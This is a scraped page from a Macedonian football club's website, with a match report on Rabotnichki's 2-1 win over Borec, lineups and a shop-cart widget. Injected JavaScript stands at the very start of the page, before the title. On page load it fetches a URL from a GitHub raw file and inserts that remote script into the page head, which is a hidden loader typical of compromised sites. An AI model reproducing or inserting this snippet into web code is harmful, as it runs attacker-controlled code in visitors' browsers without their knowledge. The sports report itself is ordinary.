;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Триумф (2-1) над Борец во последните мигови
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Триумф (2-1) над Борец во последните мигови

Работнички го победи Борец со 2-1, а со овој триумф и дефинитивно го потврди прволигашкиот статус за следната сезона. Сега тимот на Стојан Игнатов има 40 бода и се наоѓа на осмата позиција на табелата.

Работнички беше подобар ривал на овој натпревар, а до победа стигна со гол во судиското продолжение што го постигна Марјан Ристовски.

Во првото полувреме, се закани Марио Станковски, но првиот пат без ефект. Сепак, доби шанса за да постигне гол од пенал, откако Јанкулов го фаулираше Дин Аломеровиќ во шеснаесетникот. Во 45.минута, Марио Станковски успеа да реализира и да донесе водство.

Во вториот дел, се играше меѓу двата шеснаесетника, а во 75.минута Борец успеа да израмни. Крста Ѓорѓевиќ освои една топка на средината на теренот, увиде дека Бурхан Мустафа е излезен надвор од шеснаесетникот и го лобуваше од далечина.

До крајот, Работнички тргна во офанзива по победа и успеа да постигне гол во последните мигови. Марјан Ристовски најдобро се снајде и во 95.минута ја затресе мрежата на Борец.

Во следното коло, Работнички ќе и гостува на Академија Пандев во Струмица.

РАБОТНИЧКИ – БОРЕЦ 2-1 (1-0)

Национална арена „Тодор Проески“. Судија: Јосип Бартон. Стрелци: Станковски 45′ пен., Ристовски 90′ (Работнички), Ѓорѓевиќ 75′ (Борец). Ж. картони: Ристовски, Илиевски (Работнички), Ѓорѓиески, Садики (Борец).

РАБОТНИЧКИ: Мустафа, Илиевски (86′ Христов), Рашо, Ѓорѓевиќ, Гоес, Зејнулаи, Ристовски, Максимов, Станковски, Родригез (58′ Кутсија).

БОРЕЦ: Алчевски, Јанкулов, Ефтимов, Садики, Ѓорѓиески (54′ Трифунов), Алиев, Костадиновски, Ѓорѓиев, Љума, Николовски, Ибрахимовиќ (66′ Ѓорѓевиќ).